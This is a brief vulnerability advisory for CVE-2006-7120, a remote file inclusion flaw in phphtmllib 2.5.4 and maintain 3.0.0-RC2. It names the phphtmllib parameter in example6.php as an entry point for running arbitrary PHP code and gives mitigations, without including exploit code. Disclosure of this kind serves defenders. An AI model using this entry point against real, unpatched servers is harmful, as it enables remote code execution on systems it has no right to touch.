CVE-2006-7120

Name of the Vulnerable Software and Affected Versions lib/php/phphtmllib-2.5.4 maintain version 3.0.0-RC2

Description A remote file inclusion issue allows remote attackers to execute arbitrary PHP code via a URL in the phphtmllib parameter. This issue might be related to phpHtmlLib. It is noted that proper installations of maintain might not be affected since the $phphtmllib variable is set before being used.

Recommendations For maintain version 3.0.0-RC2, ensure that the $phphtmllib variable is properly set in includes.inc before being used in example6.php to prevent exploitation. For lib/php/phphtmllib-2.5.4, consider restricting access to the example6.php file until a fix is available.